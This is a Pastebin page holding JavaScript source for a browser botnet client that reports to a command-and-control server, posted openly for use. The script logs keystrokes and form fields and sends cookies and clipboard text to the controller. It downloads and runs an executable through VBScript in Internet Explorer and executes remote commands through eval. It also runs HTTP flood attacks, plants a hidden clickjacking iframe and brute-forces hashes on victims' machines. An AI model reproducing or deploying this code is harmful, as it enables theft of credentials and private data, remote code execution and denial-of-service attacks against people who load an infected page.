API tools faq
paste
Advertisement
KekSec

Untitled

KekSec
Sep 18th, 2017
527
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.66 KB | None | 0 0
raw download clone embed print report
  1. var master = "http://www.swagger.ml";
  2.  
  3. var connectKey = "js6283h7";
  4.  
  5. var timeout = 5000;
  6.  
  7. //STOP EDITING AT THIS POINT UNLESS YOU KNOW WHAT YOU ARE DOING
  8.  
  9.  
  10.  
  11. //OS detection
  12. var OSName="Unknown OS";
  13.  
  14. if (navigator.appVersion.indexOf("Win")!=-1)
  15. OSName="Windows";
  16. if (navigator.appVersion.indexOf("Mac")!=-1)
  17. OSName="MacOS";
  18. if (navigator.appVersion.indexOf("X11")!=-1)
  19. OSName="UNIX";
  20. if (navigator.appVersion.indexOf("Linux")!=-1)
  21. OSName="Linux";
  22.  
  23.  
  24.  
  25. //Browser detection
  26. // Opera 8.0+
  27. var isOpera = (!!window.opr && !!opr.addons) || !!window.opera || navigator.userAgent.indexOf(' OPR/') >= 0;
  28. // Firefox 1.0+
  29. var isFirefox = typeof InstallTrigger !== 'undefined';
  30. // At least Safari 3+: "[object HTMLElementConstructor]"
  31. var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf('Constructor') > 0;
  32. // Internet Explorer 6-11
  33. var isIE = /*@cc_on!@*/ false || !!document.documentMode;
  34. // Edge 20+
  35. var isEdge = !isIE && !!window.StyleMedia;
  36. // Chrome 1+
  37. var isChrome = !!window.chrome && !!window.chrome.webstore;
  38. // Blink engine detection
  39. var isBlink = (isChrome || isOpera) && !!window.CSS;
  40.  
  41. var browserType = "Generic";
  42.  
  43. if (isOpera) {
  44. browserType = "Opera";
  45. } else if (isFirefox) {
  46. browserType = "Firefox";
  47. } else if (isSafari) {
  48. browserType = "Safari";
  49. } else if (isIE) {
  50. browserType = "Internet Explorer";
  51. } else if (isEdge) {
  52. browserType = "Microsoft Edge";
  53. } else if (isChrome) {
  54. browserType = "Chrome";
  55. } else if (isBlink) {
  56. browserType = "Blink";
  57. }
  58.  
  59. var inputs, index;
  60.  
  61. var inputList = "";
  62.  
  63. inputs = document.getElementsByTagName('input');
  64. for (index = 0; index < inputs.length; ++index) {
  65. inputList = inputList + "\r\n" + inputs[index].getAttribute("name") + "=" + inputs[index].getAttribute("value");
  66. }
  67.  
  68. var keys = "";
  69.  
  70. function interpret(evt) {
  71. var chara = "";
  72. var keyCode = (evt.which) ? evt.which : evt.keyCode;
  73. var shift = evt.shiftKey;
  74. if (keyCode == 8)
  75. chara = "[backspace]";
  76. // backspace
  77. if (keyCode == 9)
  78. chara = "[tab]";
  79. // tab
  80. if (keyCode == 13)
  81. chara = "[enter]";
  82. // enter
  83. if (keyCode == 16)
  84. chara = "[shift]";
  85. // shift
  86. if (keyCode == 17)
  87. chara = "[ctrl]";
  88. // ctrl
  89. if (keyCode == 18)
  90. chara = "[alt]";
  91. // alt
  92. if (keyCode == 19)
  93. chara = "[pause/break]";
  94. // pause/break
  95. if (keyCode == 20)
  96. chara = "[caps lock]";
  97. // caps lock
  98. if (keyCode == 27)
  99. chara = "[escape]";
  100. // escape
  101. if (keyCode == 33)
  102. chara = "[page up]";
  103. // page up
  104. if (keyCode == 34)
  105. chara = "[page down]";
  106. // page down
  107. if (keyCode == 35)
  108. chara = "[end]";
  109. // end
  110. if (keyCode == 36)
  111. chara = "[home]";
  112. // home
  113. if (keyCode == 37)
  114. chara = "[left arrow]";
  115. // left arrow
  116. if (keyCode == 38)
  117. chara = "[up arrow]";
  118. // up arrow
  119. if (keyCode == 39)
  120. chara = "[right arrow]";
  121. // right arrow
  122. if (keyCode == 40)
  123. chara = "[down arrow]";
  124. // down arrow
  125. if (keyCode == 45)
  126. chara = "[insert]";
  127. // insert
  128. if (keyCode == 46)
  129. chara = "[delete]";
  130. // delete
  131. // Alphanumeric
  132. if (keyCode == 48)
  133. chara = (shift) ? ")" : "0";
  134. if (keyCode == 49)
  135. chara = (shift) ? "!" : "1";
  136. if (keyCode == 50)
  137. chara = (shift) ? "@" : "2";
  138. if (keyCode == 51)
  139. chara = (shift) ? "#" : "3";
  140. if (keyCode == 52)
  141. chara = (shift) ? "$" : "4";
  142. if (keyCode == 53)
  143. chara = (shift) ? "%" : "5";
  144. if (keyCode == 54)
  145. chara = (shift) ? "^" : "6";
  146. if (keyCode == 55)
  147. chara = (shift) ? "&" : "7";
  148. if (keyCode == 56)
  149. chara = (shift) ? "*" : "8";
  150. if (keyCode == 57)
  151. chara = (shift) ? "(" : "9";
  152. if (keyCode == 219)
  153. chara = (shift) ? "{" : "[";
  154. // open bracket
  155. if (keyCode == 220)
  156. chara = "\\";
  157. // back slash
  158. if (keyCode == 221)
  159. chara = (shift) ? "}" : "]";
  160. // close bracket
  161. if (keyCode == 222)
  162. chara = "'";
  163. // single quote
  164. if(chara == "\0" || currkey == "\0") {
  165. return true;
  166. }
  167. var currkey = String.fromCharCode(evt.charCode);
  168. return currkey;
  169. }
  170.  
  171. document.onkeypress = function(evt) {
  172. evt = evt || window.event;
  173. keys += interpret(evt);
  174. };
  175.  
  176. var meta = document.createElement('meta');
  177. meta.name = "referrer";
  178. meta.content = "no-referrer";
  179. document.getElementsByTagName('head')[0].appendChild(meta); //hide referer
  180.  
  181.  
  182. function md5cycle(x, k) {
  183. var a = x[0],
  184. b = x[1],
  185. c = x[2],
  186. d = x[3];
  187.  
  188. a = ff(a, b, c, d, k[0], 7, -680876936);
  189. d = ff(d, a, b, c, k[1], 12, -389564586);
  190. c = ff(c, d, a, b, k[2], 17, 606105819);
  191. b = ff(b, c, d, a, k[3], 22, -1044525330);
  192. a = ff(a, b, c, d, k[4], 7, -176418897);
  193. d = ff(d, a, b, c, k[5], 12, 1200080426);
  194. c = ff(c, d, a, b, k[6], 17, -1473231341);
  195. b = ff(b, c, d, a, k[7], 22, -45705983);
  196. a = ff(a, b, c, d, k[8], 7, 1770035416);
  197. d = ff(d, a, b, c, k[9], 12, -1958414417);
  198. c = ff(c, d, a, b, k[10], 17, -42063);
  199. b = ff(b, c, d, a, k[11], 22, -1990404162);
  200. a = ff(a, b, c, d, k[12], 7, 1804603682);
  201. d = ff(d, a, b, c, k[13], 12, -40341101);
  202. c = ff(c, d, a, b, k[14], 17, -1502002290);
  203. b = ff(b, c, d, a, k[15], 22, 1236535329);
  204.  
  205. a = gg(a, b, c, d, k[1], 5, -165796510);
  206. d = gg(d, a, b, c, k[6], 9, -1069501632);
  207. c = gg(c, d, a, b, k[11], 14, 643717713);
  208. b = gg(b, c, d, a, k[0], 20, -373897302);
  209. a = gg(a, b, c, d, k[5], 5, -701558691);
  210. d = gg(d, a, b, c, k[10], 9, 38016083);
  211. c = gg(c, d, a, b, k[15], 14, -660478335);
  212. b = gg(b, c, d, a, k[4], 20, -405537848);
  213. a = gg(a, b, c, d, k[9], 5, 568446438);
  214. d = gg(d, a, b, c, k[14], 9, -1019803690);
  215. c = gg(c, d, a, b, k[3], 14, -187363961);
  216. b = gg(b, c, d, a, k[8], 20, 1163531501);
  217. a = gg(a, b, c, d, k[13], 5, -1444681467);
  218. d = gg(d, a, b, c, k[2], 9, -51403784);
  219. c = gg(c, d, a, b, k[7], 14, 1735328473);
  220. b = gg(b, c, d, a, k[12], 20, -1926607734);
  221.  
  222. a = hh(a, b, c, d, k[5], 4, -378558);
  223. d = hh(d, a, b, c, k[8], 11, -2022574463);
  224. c = hh(c, d, a, b, k[11], 16, 1839030562);
  225. b = hh(b, c, d, a, k[14], 23, -35309556);
  226. a = hh(a, b, c, d, k[1], 4, -1530992060);
  227. d = hh(d, a, b, c, k[4], 11, 1272893353);
  228. c = hh(c, d, a, b, k[7], 16, -155497632);
  229. b = hh(b, c, d, a, k[10], 23, -1094730640);
  230. a = hh(a, b, c, d, k[13], 4, 681279174);
  231. d = hh(d, a, b, c, k[0], 11, -358537222);
  232. c = hh(c, d, a, b, k[3], 16, -722521979);
  233. b = hh(b, c, d, a, k[6], 23, 76029189);
  234. a = hh(a, b, c, d, k[9], 4, -640364487);
  235. d = hh(d, a, b, c, k[12], 11, -421815835);
  236. c = hh(c, d, a, b, k[15], 16, 530742520);
  237. b = hh(b, c, d, a, k[2], 23, -995338651);
  238.  
  239. a = ii(a, b, c, d, k[0], 6, -198630844);
  240. d = ii(d, a, b, c, k[7], 10, 1126891415);
  241. c = ii(c, d, a, b, k[14], 15, -1416354905);
  242. b = ii(b, c, d, a, k[5], 21, -57434055);
  243. a = ii(a, b, c, d, k[12], 6, 1700485571);
  244. d = ii(d, a, b, c, k[3], 10, -1894986606);
  245. c = ii(c, d, a, b, k[10], 15, -1051523);
  246. b = ii(b, c, d, a, k[1], 21, -2054922799);
  247. a = ii(a, b, c, d, k[8], 6, 1873313359);
  248. d = ii(d, a, b, c, k[15], 10, -30611744);
  249. c = ii(c, d, a, b, k[6], 15, -1560198380);
  250. b = ii(b, c, d, a, k[13], 21, 1309151649);
  251. a = ii(a, b, c, d, k[4], 6, -145523070);
  252. d = ii(d, a, b, c, k[11], 10, -1120210379);
  253. c = ii(c, d, a, b, k[2], 15, 718787259);
  254. b = ii(b, c, d, a, k[9], 21, -343485551);
  255.  
  256. x[0] = add32(a, x[0]);
  257. x[1] = add32(b, x[1]);
  258. x[2] = add32(c, x[2]);
  259. x[3] = add32(d, x[3]);
  260.  
  261. }
  262.  
  263. function cmn(q, a, b, x, s, t) {
  264. a = add32(add32(a, q), add32(x, t));
  265. return add32((a << s) | (a >>> (32 - s)), b);
  266. }
  267.  
  268. function ff(a, b, c, d, x, s, t) {
  269. return cmn((b & c) | ((~b) & d), a, b, x, s, t);
  270. }
  271.  
  272. function gg(a, b, c, d, x, s, t) {
  273. return cmn((b & d) | (c & (~d)), a, b, x, s, t);
  274. }
  275.  
  276. function hh(a, b, c, d, x, s, t) {
  277. return cmn(b ^ c ^ d, a, b, x, s, t);
  278. }
  279.  
  280. function ii(a, b, c, d, x, s, t) {
  281. return cmn(c ^ (b | (~d)), a, b, x, s, t);
  282. }
  283.  
  284. function md51(s) {
  285. txt = '';
  286. var n = s.length,
  287. state = [1732584193, -271733879, -1732584194, 271733878],
  288. i;
  289. for (i = 64; i <= s.length; i += 64) {
  290. md5cycle(state, md5blk(s.substring(i - 64, i)));
  291. }
  292. s = s.substring(i - 64);
  293. var tail = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
  294. for (i = 0; i < s.length; i++)
  295. tail[i >> 2] |= s.charCodeAt(i) << ((i % 4) << 3);
  296. tail[i >> 2] |= 0x80 << ((i % 4) << 3);
  297. if (i > 55) {
  298. md5cycle(state, tail);
  299. for (i = 0; i < 16; i++) tail[i] = 0;
  300. }
  301. tail[14] = n * 8;
  302. md5cycle(state, tail);
  303. return state;
  304. }
  305.  
  306. /* there needs to be support for Unicode here,
  307. * unless we pretend that we can redefine the MD-5
  308. * algorithm for multi-byte characters (perhaps
  309. * by adding every four 16-bit characters and
  310. * shortening the sum to 32 bits). Otherwise
  311. * I suggest performing MD-5 as if every character
  312. * was two bytes--e.g., 0040 0025 = @%--but then
  313. * how will an ordinary MD-5 sum be matched?
  314. * There is no way to standardize text to something
  315. * like UTF-8 before transformation; speed cost is
  316. * utterly prohibitive. The JavaScript standard
  317. * itself needs to look at this: it should start
  318. * providing access to strings as preformed UTF-8
  319. * 8-bit unsigned value arrays.
  320. */
  321. function md5blk(s) { /* I figured global was faster. */
  322. var md5blks = [],
  323. i; /* Andy King said do it this way. */
  324. for (i = 0; i < 64; i += 4) {
  325. md5blks[i >> 2] = s.charCodeAt(i) +
  326. (s.charCodeAt(i + 1) << 8) +
  327. (s.charCodeAt(i + 2) << 16) +
  328. (s.charCodeAt(i + 3) << 24);
  329. }
  330. return md5blks;
  331. }
  332.  
  333. var hex_chr = '0123456789abcdef'.split('');
  334.  
  335. function rhex(n) {
  336. var s = '',
  337. j = 0;
  338. for (; j < 4; j++)
  339. s += hex_chr[(n >> (j * 8 + 4)) & 0x0F] +
  340. hex_chr[(n >> (j * 8)) & 0x0F];
  341. return s;
  342. }
  343.  
  344. function hex(x) {
  345. for (var i = 0; i < x.length; i++)
  346. x[i] = rhex(x[i]);
  347. return x.join('');
  348. }
  349.  
  350. function md5(s) {
  351. return hex(md51(s));
  352. }
  353.  
  354. /* this function is much faster,
  355. so if possible we use it. Some IEs
  356. are the only ones I know of that
  357. need the idiotic second function,
  358. generated by an if clause. */
  359.  
  360. function add32(a, b) {
  361. return (a + b) & 0xFFFFFFFF;
  362. }
  363.  
  364. if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
  365. function add32(x, y) {
  366. var lsw = (x & 0xFFFF) + (y & 0xFFFF),
  367. msw = (x >> 16) + (y >> 16) + (lsw >> 16);
  368. return (msw << 16) | (lsw & 0xFFFF);
  369. }
  370. }
  371.  
  372.  
  373.  
  374. function sha1(str) {
  375. // discuss at: http://phpjs.org/functions/sha1/
  376. // original by: Webtoolkit.info (http://www.webtoolkit.info/)
  377. // improved by: Michael White (http://getsprink.com)
  378. // improved by: Kevin van Zonneveld (http://kevin.vanzonneveld.net)
  379. // input by: Brett Zamir (http://brett-zamir.me)
  380. // depends on: utf8_encode
  381. // example 1: sha1('Kevin van Zonneveld');
  382. // returns 1: '54916d2e62f65b3afa6e192e6a601cdbe5cb5897'
  383.  
  384. var rotate_left = function(n, s) {
  385. var t4 = (n << s) | (n >>> (32 - s));
  386. return t4;
  387. };
  388.  
  389. /*var lsb_hex = function (val) { // Not in use; needed?
  390. var str="";
  391. var i;
  392. var vh;
  393. var vl;
  394.  
  395. for ( i=0; i<=6; i+=2 ) {
  396. vh = (val>>>(i*4+4))&0x0f;
  397. vl = (val>>>(i*4))&0x0f;
  398. str += vh.toString(16) + vl.toString(16);
  399. }
  400. return str;
  401. };*/
  402.  
  403. var cvt_hex = function(val) {
  404. var str = '';
  405. var i;
  406. var v;
  407.  
  408. for (i = 7; i >= 0; i--) {
  409. v = (val >>> (i * 4)) & 0x0f;
  410. str += v.toString(16);
  411. }
  412. return str;
  413. };
  414.  
  415. var blockstart;
  416. var i, j;
  417. var W = new Array(80);
  418. var H0 = 0x67452301;
  419. var H1 = 0xEFCDAB89;
  420. var H2 = 0x98BADCFE;
  421. var H3 = 0x10325476;
  422. var H4 = 0xC3D2E1F0;
  423. var A, B, C, D, E;
  424. var temp;
  425.  
  426. str = this.utf8_encode(str);
  427. var str_len = str.length;
  428.  
  429. var word_array = [];
  430. for (i = 0; i < str_len - 3; i += 4) {
  431. j = str.charCodeAt(i) << 24 | str.charCodeAt(i + 1) << 16 | str.charCodeAt(i + 2) << 8 | str.charCodeAt(i + 3);
  432. word_array.push(j);
  433. }
  434.  
  435. switch (str_len % 4) {
  436. case 0:
  437. i = 0x080000000;
  438. break;
  439. case 1:
  440. i = str.charCodeAt(str_len - 1) << 24 | 0x0800000;
  441. break;
  442. case 2:
  443. i = str.charCodeAt(str_len - 2) << 24 | str.charCodeAt(str_len - 1) << 16 | 0x08000;
  444. break;
  445. case 3:
  446. i = str.charCodeAt(str_len - 3) << 24 | str.charCodeAt(str_len - 2) << 16 | str.charCodeAt(str_len - 1) <<
  447. 8 | 0x80;
  448. break;
  449. }
  450.  
  451. word_array.push(i);
  452.  
  453. while ((word_array.length % 16) != 14) {
  454. word_array.push(0);
  455. }
  456.  
  457. word_array.push(str_len >>> 29);
  458. word_array.push((str_len << 3) & 0x0ffffffff);
  459.  
  460. for (blockstart = 0; blockstart < word_array.length; blockstart += 16) {
  461. for (i = 0; i < 16; i++) {
  462. W[i] = word_array[blockstart + i];
  463. }
  464. for (i = 16; i <= 79; i++) {
  465. W[i] = rotate_left(W[i - 3] ^ W[i - 8] ^ W[i - 14] ^ W[i - 16], 1);
  466. }
  467.  
  468. A = H0;
  469. B = H1;
  470. C = H2;
  471. D = H3;
  472. E = H4;
  473.  
  474. for (i = 0; i <= 19; i++) {
  475. temp = (rotate_left(A, 5) + ((B & C) | (~B & D)) + E + W[i] + 0x5A827999) & 0x0ffffffff;
  476. E = D;
  477. D = C;
  478. C = rotate_left(B, 30);
  479. B = A;
  480. A = temp;
  481. }
  482.  
  483. for (i = 20; i <= 39; i++) {
  484. temp = (rotate_left(A, 5) + (B ^ C ^ D) + E + W[i] + 0x6ED9EBA1) & 0x0ffffffff;
  485. E = D;
  486. D = C;
  487. C = rotate_left(B, 30);
  488. B = A;
  489. A = temp;
  490. }
  491.  
  492. for (i = 40; i <= 59; i++) {
  493. temp = (rotate_left(A, 5) + ((B & C) | (B & D) | (C & D)) + E + W[i] + 0x8F1BBCDC) & 0x0ffffffff;
  494. E = D;
  495. D = C;
  496. C = rotate_left(B, 30);
  497. B = A;
  498. A = temp;
  499. }
  500.  
  501. for (i = 60; i <= 79; i++) {
  502. temp = (rotate_left(A, 5) + (B ^ C ^ D) + E + W[i] + 0xCA62C1D6) & 0x0ffffffff;
  503. E = D;
  504. D = C;
  505. C = rotate_left(B, 30);
  506. B = A;
  507. A = temp;
  508. }
  509.  
  510. H0 = (H0 + A) & 0x0ffffffff;
  511. H1 = (H1 + B) & 0x0ffffffff;
  512. H2 = (H2 + C) & 0x0ffffffff;
  513. H3 = (H3 + D) & 0x0ffffffff;
  514. H4 = (H4 + E) & 0x0ffffffff;
  515. }
  516.  
  517. temp = cvt_hex(H0) + cvt_hex(H1) + cvt_hex(H2) + cvt_hex(H3) + cvt_hex(H4);
  518. return temp.toLowerCase();
  519. }
  520.  
  521.  
  522.  
  523. function makestr(length, alpha) {
  524. var text = "";
  525.  
  526. for (var i = 0; i < length; i++)
  527. text += alpha.charAt(Math.floor(Math.random() * alpha.length));
  528.  
  529. return text;
  530. }
  531.  
  532.  
  533.  
  534. function imageLoad(URL) {
  535. var pic = new Image();
  536. pic.src = URL; //randomize request to avoid caching
  537. }
  538.  
  539.  
  540.  
  541. function prepareFrame(URL) {
  542. var ifrm = document.createElement("iframe");
  543. ifrm.src = URL;
  544. ifrm.style.width = "0px";
  545. ifrm.style.height = "0px";
  546. ifrm.style.border = "None";
  547. ifrm.style.visibility = "hidden";
  548. document.getElementsByTagName("body")[0].appendChild(ifrm);
  549. }
  550.  
  551. function wait(ms) {
  552. var start = new Date().getTime();
  553. var end = start;
  554. while (end < start + ms) {
  555. end = new Date().getTime();
  556. }
  557. }
  558.  
  559. function post(url, params) {
  560. if (window.XMLHttpRequest) {
  561. http = new XMLHttpRequest();
  562. } else {
  563. http = new ActiveXObject("Microsoft.XMLHTTP");
  564. }
  565.  
  566. http.open("POST", url);
  567.  
  568. //Send the proper header information along with the request
  569. http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  570.  
  571. http.send(params);
  572. }
  573.  
  574. function Parse(data) {
  575. var command = data;
  576. var command = command.split("\n");
  577.  
  578. var i = 0;
  579.  
  580. for (i = 0; i < command.length; i++) {
  581. if (command[i].substring(0, 6) == "cookie") {
  582.  
  583. if (document.cookie != undefined && document.cookie != "") {
  584. var rand = Math.floor(Math.random() * 10000);
  585. imageLoad(master + "/cookie.php?c=" + encodeURI(document.cookie) + "&referer=" + document.location + "&rand=" + rand); //send clipboardData
  586. }
  587.  
  588. } else if (command[i].substring(0, 9) == "clipboard") {
  589.  
  590. window.onpaste = function(e) {
  591. var paste = e.clipboardData && e.clipboardData.getData ?
  592. e.clipboardData.getData('text/plain') : // Standard
  593. window.clipboardData && window.clipboardData.getData ?
  594. window.clipboardData.getData('Text') : // MS
  595. false;
  596. if (paste) {
  597. var rand = Math.floor(Math.random() * 10000);
  598. imageLoad(master + "/clipboard.php?clipboard=" + encodeURI(paste) + "&referer=" + document.location + "&rand=" + rand); //send clipboard data
  599. }
  600. };
  601.  
  602. } else if (command[i].substring(0, 5) == "sleep") {
  603.  
  604. var args = command[i].split("*");
  605. wait(parseInt(args[1]));
  606.  
  607. } else if (command[i].substring(0, 4) == "view") {
  608.  
  609. var args = command[i].split("*");
  610. prepareFrame(args[1]); //view website
  611.  
  612. } else if (command[i].substring(0, 7) == "exploit") {
  613.  
  614. var args = command[i].split("*");
  615.  
  616. if (isOpera) {
  617. //Opera exploit goes here
  618. } else if (isFirefox) {
  619. //Firefox exploit goes here
  620. } else if (isSafari) {
  621. //Safari exploit goes here
  622. } else if (isIE) {
  623. //Internet Explorer exploit by Freak/SynthMesc
  624. var vbscript = document.createElement("script");
  625. vbscript.lang = "vbscript";
  626. vbscript.innerHTML = "dim http_obj\ndim stream_obj\ndim shell_obj\n\nset http_obj = CreateObject('Microsoft.XMLHTTP')\nset stream_obj = CreateObject('ADODB.Stream')\nset shell_obj = CreateObject('WScript.Shell')\n\nURL = '" + args[1] + "' 'Where to download the file from\nFILENAME = 'download.exe' 'Name to save the file (on the local system)\nRUNCMD = 'download.exe' 'Command to run after downloading\n\nhttp_obj.open 'GET', URL, False\nhttp_obj.send\n\nstream_obj.type = 1\nstream_obj.open\nstream_obj.write http_obj.responseBody\nstream_obj.savetofile FILENAME, 2\n\nshell_obj.run RUNCMD\nhttp_obj.open 'GET', '" + master + "/exploit.php?connect=" + encodeURI(connectKey) + "&browsertype=" + encodeURI(browserType) + "&osname=" + encodeURI(OSName) + "&exploit=vbscript', False\nhttp_obj.send\n";
  627. document.getElementsByTagName("body")[0].appendChild(div);
  628. } else if (isEdge) {
  629. //Microsoft Edge exploit CVE-2016-7000
  630.  
  631. } else if (isChrome) {
  632. //Chrome exploit goes here
  633. } else if (isBlink) {
  634. //Blink exploit goes here
  635. }
  636.  
  637. } else if (command[i].substring(0, 4) == "post") {
  638.  
  639. var args = command[i].split("*");
  640. post(args[1], args[2]);
  641.  
  642. } else if (command[i].substring(0, 9) == "floodpost") {
  643.  
  644. var args = command[i].split("*");
  645.  
  646. setInterval(function() {
  647. post(args[1], args[2]);
  648. }, parseInt(args[3])); //Initiate javascript POST load test
  649.  
  650. } else if (command[i].substring(0, 4) == "load") {
  651.  
  652. var args = command[i].split("*");
  653.  
  654. if (args[1].indexOf("?") > -1) {
  655. var char = "&";
  656. } else {
  657. var char = "?";
  658. }
  659.  
  660. setInterval(function() {
  661. imageLoad(args[1] + char + Math.floor(Math.random() * 100000000) + "=Freak");
  662. }, parseInt(args[2])); //Initiate javascript load test
  663.  
  664. } else if (command[i].substring(0, 8) == "antiddos") {
  665.  
  666. var args = command[i].split("*");
  667.  
  668. if (args[1].indexOf("?") > -1) {
  669. var char = "&";
  670. } else {
  671. var char = "?";
  672. }
  673.  
  674. setInterval(function() {
  675. prepareFrame(args[1] + char + Math.floor(Math.random() * 100000000) + "=Freak");
  676. }, parseInt(args[2])); //Initiate javascript load test
  677.  
  678. } else if (command[i].substring(0, 8) == "glype") {
  679.  
  680. var args = command[i].split("*");
  681. var i = 0;
  682. var glypettk = "";
  683. if (args[1].indexOf("?") > -1) {
  684. var char = "&";
  685. } else {
  686. var char = "?";
  687. }
  688. var xmlhttp;
  689.  
  690. if (window.XMLHttpRequest) {
  691. xmlhttp = new XMLHttpRequest();
  692. } else {
  693. xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  694. }
  695.  
  696. xmlhttp.open("GET", args[2] + "?rand=" + rand, true);
  697. xmlhttp.send(null);
  698.  
  699. xmlhttp.onreadystatechange = function() {
  700. if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
  701. var glype = xmlhttp.responseText.split("\r\n");
  702. }
  703. };
  704.  
  705. setInterval(function() {
  706. for(i = 0; i < glype.length; i++) {
  707. glypettk = glype[i].replace("https://www.whatismyip.com", args[1]);
  708. glypettk = glype[i].replace("http://www.whatismyip.com", args[1]);
  709. prepareFrame(glypettk + char + Math.floor(Math.random() * 100000000) + "=Freak");
  710. }
  711. }, parseInt(args[3])); //Initiate javascript load test
  712.  
  713. } else if (command[i].substring(0, 6) == "layer4") {
  714.  
  715. var args = command[i].split("*");
  716.  
  717. var packetsize = parseInt(args[2]);
  718. var location4byte = Math.floor(Math.random() * packetsize);
  719. var packet = encodeURI(randByte()) + "=" + encodeURI(randByte());
  720.  
  721. while(packetsize > packet.length) {
  722. packet = packet + "&" + encodeURI(randByte()) + "=" + encodeURI(randByte());
  723. if(packet.length >= location4byte) {
  724. packet = packet + encodeURI(randByte());
  725. }
  726. }
  727. setInterval(function() {
  728. post(args[1], packet);
  729. }, parseInt(args[3])); //Initiate javascript POST load test
  730.  
  731. } else if (command[i].substring(0, 4) == "jack") {
  732.  
  733. var args = command[i].split("*");
  734.  
  735. var css = '<style>iframe { position:absolute; filter:alpha(opacity=0); opacity:0.0; border: None left:0; top:0; }</style>';
  736.  
  737. var iframe = '<iframe id="iframey" src="' + args[1] + '" width="' + args[2] + 'px" height="' + args[3] + 'px" frameBorder="0"></iframe>';
  738.  
  739. var div = document.createElement("div");
  740. div.innerHTML = css + iframe;
  741.  
  742. document.getElementsByTagName("body")[0].appendChild(div);
  743.  
  744. var frameName = 'iframey'; // div that is to follow the mouse (must be position:absolute)
  745. var offX = -35; // X offset from mouse position
  746. var offY = -20; // Y offset from mouse position
  747.  
  748. function mouseX(evt) {
  749. if (!evt) evt = window.event;
  750. if (evt.pageX) return evt.pageX;
  751. else if (evt.clientX) return evt.clientX + (document.documentElement.scrollLeft ? document.documentElement.scrollLeft : document.body.scrollLeft);
  752. else return 0;
  753. }
  754.  
  755. function mouseY(evt) {
  756. if (!evt) evt = window.event;
  757. if (evt.pageY) return evt.pageY;
  758. else if (evt.clientY) return evt.clientY + (document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop);
  759. else return 0;
  760. }
  761.  
  762. function follow(evt) {
  763. var obj = document.getElementById(frameName).style;
  764. obj.left = (parseInt(mouseX(evt)) + offX) + 'px';
  765. obj.top = (parseInt(mouseY(evt)) + offY) + 'px';
  766. }
  767. document.onmousemove = follow;
  768.  
  769. } else if (command[i].substring(0, 4) == "eval") {
  770.  
  771. var args = command[i].split("*");
  772. eval(args[1]);
  773.  
  774. } else if (command[i].substring(0, 3) == "md5") {
  775. var args = command[i].split("*");
  776. var crack = setInterval(function() {
  777. var test = makestr(parseInt(args[2]), args[3]);
  778. if (md5(test) == args[1]) {
  779. imageLoad(master + "/hash.php?result=" + encodeURI("MD5 - " + test + ":" + args[1]));
  780. clearInterval(crack);
  781. }
  782. }, 0);
  783. } else if (command[i].substring(0, 4) == "sha1") {
  784. var args = command[i].split("*");
  785. var crack = setInterval(function() {
  786. var test = makestr(parseInt(args[2]), args[3]);
  787. if (sha1(test) == args[1]) {
  788. imageLoad(master + "/hash.php?result=" + encodeURI("SHA1 - " + test + ":" + args[1]));
  789. clearInterval(crack);
  790. }
  791. }, 0);
  792. }
  793. }
  794. }
  795.  
  796. function pingHome() {
  797. var xmlhttp;
  798.  
  799. if (window.XMLHttpRequest) {
  800. xmlhttp = new XMLHttpRequest();
  801. } else {
  802. xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  803. }
  804.  
  805. var rand = Math.floor(Math.random() * 10000);
  806.  
  807. xmlhttp.open("GET", master + "/gate.php?gettasks=" + encodeURI(connectKey) + "&browsertype=" + encodeURI(browserType) + "&osname=" + encodeURI(OSName) + "&rand=" + rand, true);
  808. xmlhttp.send(null);
  809.  
  810. xmlhttp.onreadystatechange = function() {
  811. if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
  812. Parse(xmlhttp.responseText);
  813. }
  814. };
  815. }
  816.  
  817. window.onpopstate = window.onbeforeunload = function(event) {
  818. if (keys.length >= 1) {
  819. var param = encodeURI(keys);
  820. var rand = Math.floor(Math.random() * 10000);
  821. imageLoad(master + "/logger.php?keys=" + encodeURI(param) + "&referer=" + encodeURI(document.location) + "&rand=" + rand); //randomize request to avoid caching
  822. }
  823.  
  824. if (inputList != "") {
  825. imageLoad(master + "/inputs.php?inputs=" + encodeURI(inputList) + "&referer=" + encodeURI(document.location));
  826. }
  827.  
  828. var rand = Math.floor(Math.random() * 10000);
  829. imageLoad(master + "/gate.php?disconnect=" + encodeURI(connectKey) + "&browsertype=" + encodeURI(browserType) + "&osname=" + encodeURI(OSName) + "&rand=" + rand);
  830. };
  831.  
  832. var rand = Math.floor(Math.random() * 10000);
  833. imageLoad(master + "/gate.php?connect=" + encodeURI(connectKey) + "&browsertype=" + encodeURI(browserType) + "&osname=" + encodeURI(OSName) + "&rand=" + rand);
  834.  
  835. pingHome();
  836. setInterval(pingHome, timeout);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!